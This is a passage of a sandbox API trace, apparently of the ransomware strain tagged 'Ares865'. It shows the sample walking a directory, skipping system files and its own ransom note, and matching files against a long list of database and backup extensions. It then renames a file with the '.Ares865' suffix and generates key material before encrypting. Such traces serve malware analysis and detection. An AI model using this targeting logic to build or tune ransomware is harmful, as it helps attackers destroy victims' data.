ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d4c040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0058.156] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.156] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0058.156] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.156] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49d4c040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49d4c040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.156] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.156] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0058.156] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.156] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.156] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0058.156] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0058.157] lstrlenW (lpString="desktop.ini") returned 11 [0058.157] lstrlenW (lpString="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\*") returned 64 [0058.157] lstrcpyW (in: lpString1=0x2cce47e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0058.157] lstrlenW (lpString="desktop.ini") returned 11 [0058.157] lstrlenW (lpString="Ares865") returned 7 [0058.157] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0058.157] lstrlenW (lpString=".dll") returned 4 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0058.157] lstrlenW (lpString=".lnk") returned 4 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0058.157] lstrlenW (lpString=".ini") returned 4 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0058.157] lstrlenW (lpString=".sys") returned 4 [0058.157] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0058.157] lstrlenW (lpString="desktop.ini") returned 11 [0058.157] lstrlenW (lpString="bak") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0058.157] lstrlenW (lpString="ba_") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0058.157] lstrlenW (lpString="dbb") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0058.157] lstrlenW (lpString="vmdk") returned 4 [0058.157] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0058.157] lstrlenW (lpString="rar") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0058.157] lstrlenW (lpString="zip") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0058.157] lstrlenW (lpString="tgz") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0058.157] lstrlenW (lpString="vbox") returned 4 [0058.157] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0058.157] lstrlenW (lpString="vdi") returned 3 [0058.157] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0058.158] lstrlenW (lpString="vhd") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0058.158] lstrlenW (lpString="vhdx") returned 4 [0058.158] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0058.158] lstrlenW (lpString="avhd") returned 4 [0058.158] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0058.158] lstrlenW (lpString="db") returned 2 [0058.158] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0058.158] lstrlenW (lpString="db2") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0058.158] lstrlenW (lpString="db3") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0058.158] lstrlenW (lpString="dbf") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0058.158] lstrlenW (lpString="mdf") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0058.158] lstrlenW (lpString="mdb") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0058.158] lstrlenW (lpString="sql") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0058.158] lstrlenW (lpString="sqlite") returned 6 [0058.158] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0058.158] lstrlenW (lpString="sqlite3") returned 7 [0058.158] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0058.158] lstrlenW (lpString="sqlitedb") returned 8 [0058.158] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0058.158] lstrlenW (lpString="xml") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0058.158] lstrlenW (lpString="$er") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0058.158] lstrlenW (lpString="4dd") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0058.158] lstrlenW (lpString="4dl") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0058.158] lstrlenW (lpString="^^^") returned 3 [0058.158] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0058.159] lstrlenW (lpString="abs") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0058.159] lstrlenW (lpString="abx") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0058.159] lstrlenW (lpString="accdb") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0058.159] lstrlenW (lpString="accdc") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0058.159] lstrlenW (lpString="accde") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0058.159] lstrlenW (lpString="accdr") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0058.159] lstrlenW (lpString="accdt") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0058.159] lstrlenW (lpString="accdw") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0058.159] lstrlenW (lpString="accft") returned 5 [0058.159] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0058.159] lstrlenW (lpString="adb") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.159] lstrlenW (lpString="adb") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0058.159] lstrlenW (lpString="ade") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0058.159] lstrlenW (lpString="adf") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0058.159] lstrlenW (lpString="adn") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0058.159] lstrlenW (lpString="adp") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0058.159] lstrlenW (lpString="alf") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0058.159] lstrlenW (lpString="ask") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0058.159] lstrlenW (lpString="btr") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0058.159] lstrlenW (lpString="cat") returned 3 [0058.159] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0058.159] lstrlenW (lpString="cdb") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0058.160] lstrlenW (lpString="ckp") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0058.160] lstrlenW (lpString="cma") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0058.160] lstrlenW (lpString="cpd") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0058.160] lstrlenW (lpString="dacpac") returned 6 [0058.160] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0058.160] lstrlenW (lpString="dad") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0058.160] lstrlenW (lpString="dadiagrams") returned 10 [0058.160] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0058.160] lstrlenW (lpString="daschema") returned 8 [0058.160] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0058.160] lstrlenW (lpString="db-journal") returned 10 [0058.160] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0058.160] lstrlenW (lpString="db-shm") returned 6 [0058.160] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0058.160] lstrlenW (lpString="db-wal") returned 6 [0058.160] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0058.160] lstrlenW (lpString="dbc") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0058.160] lstrlenW (lpString="dbs") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0058.160] lstrlenW (lpString="dbt") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0058.160] lstrlenW (lpString="dbv") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0058.160] lstrlenW (lpString="dbx") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0058.160] lstrlenW (lpString="dcb") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0058.160] lstrlenW (lpString="dct") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0058.160] lstrlenW (lpString="dcx") returned 3 [0058.160] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0058.160] lstrlenW (lpString="ddl") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0058.161] lstrlenW (lpString="dlis") returned 4 [0058.161] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0058.161] lstrlenW (lpString="dp1") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0058.161] lstrlenW (lpString="dqy") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0058.161] lstrlenW (lpString="dsk") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0058.161] lstrlenW (lpString="dsn") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0058.161] lstrlenW (lpString="dtsx") returned 4 [0058.161] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0058.161] lstrlenW (lpString="dxl") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0058.161] lstrlenW (lpString="eco") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0058.161] lstrlenW (lpString="ecx") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0058.161] lstrlenW (lpString="edb") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0058.161] lstrlenW (lpString="epim") returned 4 [0058.161] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0058.161] lstrlenW (lpString="fcd") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0058.161] lstrlenW (lpString="fdb") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0058.161] lstrlenW (lpString="fic") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0058.161] lstrlenW (lpString="flexolibrary") returned 12 [0058.161] lstrlenW (lpString="fm5") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0058.161] lstrlenW (lpString="fmp") returned 3 [0058.161] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0058.161] lstrlenW (lpString="fmp12") returned 5 [0058.161] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0058.161] lstrlenW (lpString="fmpsl") returned 5 [0058.161] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0058.162] lstrlenW (lpString="fol") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0058.162] lstrlenW (lpString="fp3") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0058.162] lstrlenW (lpString="fp4") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0058.162] lstrlenW (lpString="fp5") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0058.162] lstrlenW (lpString="fp7") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0058.162] lstrlenW (lpString="fpt") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0058.162] lstrlenW (lpString="frm") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0058.162] lstrlenW (lpString="gdb") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.162] lstrlenW (lpString="gdb") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0058.162] lstrlenW (lpString="grdb") returned 4 [0058.162] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0058.162] lstrlenW (lpString="gwi") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0058.162] lstrlenW (lpString="hdb") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0058.162] lstrlenW (lpString="his") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0058.162] lstrlenW (lpString="ib") returned 2 [0058.162] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0058.162] lstrlenW (lpString="idb") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0058.162] lstrlenW (lpString="ihx") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0058.162] lstrlenW (lpString="itdb") returned 4 [0058.162] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0058.162] lstrlenW (lpString="itw") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0058.162] lstrlenW (lpString="jet") returned 3 [0058.162] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0058.163] lstrlenW (lpString="jtx") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0058.163] lstrlenW (lpString="kdb") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0058.163] lstrlenW (lpString="kexi") returned 4 [0058.163] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0058.163] lstrlenW (lpString="kexic") returned 5 [0058.163] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0058.163] lstrlenW (lpString="kexis") returned 5 [0058.163] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0058.163] lstrlenW (lpString="lgc") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0058.163] lstrlenW (lpString="lwx") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0058.163] lstrlenW (lpString="maf") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0058.163] lstrlenW (lpString="maq") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0058.163] lstrlenW (lpString="mar") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0058.163] lstrlenW (lpString="marshal") returned 7 [0058.163] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0058.163] lstrlenW (lpString="mas") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0058.163] lstrlenW (lpString="mav") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0058.163] lstrlenW (lpString="maw") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0058.163] lstrlenW (lpString="mdbhtml") returned 7 [0058.163] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0058.163] lstrlenW (lpString="mdn") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0058.163] lstrlenW (lpString="mdt") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0058.163] lstrlenW (lpString="mfd") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0058.163] lstrlenW (lpString="mpd") returned 3 [0058.163] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0058.164] lstrlenW (lpString="mrg") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0058.164] lstrlenW (lpString="mud") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0058.164] lstrlenW (lpString="mwb") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0058.164] lstrlenW (lpString="myd") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0058.164] lstrlenW (lpString="ndf") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0058.164] lstrlenW (lpString="nnt") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0058.164] lstrlenW (lpString="nrmlib") returned 6 [0058.164] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0058.164] lstrlenW (lpString="ns2") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0058.164] lstrlenW (lpString="ns3") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0058.164] lstrlenW (lpString="ns4") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0058.164] lstrlenW (lpString="nsf") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0058.164] lstrlenW (lpString="nv") returned 2 [0058.164] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0058.164] lstrlenW (lpString="nv2") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0058.164] lstrlenW (lpString="nwdb") returned 4 [0058.164] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0058.164] lstrlenW (lpString="nyf") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0058.164] lstrlenW (lpString="odb") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.164] lstrlenW (lpString="odb") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0058.164] lstrlenW (lpString="oqy") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0058.164] lstrlenW (lpString="ora") returned 3 [0058.164] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0058.165] lstrlenW (lpString="orx") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0058.165] lstrlenW (lpString="owc") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0058.165] lstrlenW (lpString="p96") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0058.165] lstrlenW (lpString="p97") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0058.165] lstrlenW (lpString="pan") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0058.165] lstrlenW (lpString="pdb") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0058.165] lstrlenW (lpString="pdm") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0058.165] lstrlenW (lpString="pnz") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0058.165] lstrlenW (lpString="qry") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0058.165] lstrlenW (lpString="qvd") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0058.165] lstrlenW (lpString="rbf") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0058.165] lstrlenW (lpString="rctd") returned 4 [0058.165] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0058.165] lstrlenW (lpString="rod") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0058.165] lstrlenW (lpString="rodx") returned 4 [0058.165] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0058.165] lstrlenW (lpString="rpd") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0058.165] lstrlenW (lpString="rsd") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0058.165] lstrlenW (lpString="sas7bdat") returned 8 [0058.165] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0058.165] lstrlenW (lpString="sbf") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0058.165] lstrlenW (lpString="scx") returned 3 [0058.165] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0058.166] lstrlenW (lpString="sdb") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0058.166] lstrlenW (lpString="sdc") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0058.166] lstrlenW (lpString="sdf") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0058.166] lstrlenW (lpString="sis") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0058.166] lstrlenW (lpString="spq") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0058.166] lstrlenW (lpString="te") returned 2 [0058.166] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0058.166] lstrlenW (lpString="teacher") returned 7 [0058.166] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0058.166] lstrlenW (lpString="tmd") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0058.166] lstrlenW (lpString="tps") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0058.166] lstrlenW (lpString="trc") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.166] lstrlenW (lpString="trc") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0058.166] lstrlenW (lpString="trm") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0058.166] lstrlenW (lpString="udb") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0058.166] lstrlenW (lpString="udl") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0058.166] lstrlenW (lpString="usr") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0058.166] lstrlenW (lpString="v12") returned 3 [0058.166] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0058.166] lstrlenW (lpString="vis") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0058.167] lstrlenW (lpString="vpd") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0058.167] lstrlenW (lpString="vvv") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0058.167] lstrlenW (lpString="wdb") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0058.167] lstrlenW (lpString="wmdb") returned 4 [0058.167] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0058.167] lstrlenW (lpString="wrk") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0058.167] lstrlenW (lpString="xdb") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0058.167] lstrlenW (lpString="xld") returned 3 [0058.167] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0058.167] lstrlenW (lpString="xmlff") returned 5 [0058.167] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0058.167] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865") returned 82 [0058.167] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\desktop.ini" (normalized: "c:\\users\\default user\\start menu\\programs\\administrative tools\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\administrative tools\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0058.168] CreateFileW (lpFileName="C:\\Users\\Default User\\Start Menu\\Programs\\Administrative Tools\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\start menu\\programs\\administrative tools\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0058.168] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0058.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0058.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0058.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0058.168] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0058.169] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0058.169] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0058.169] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) 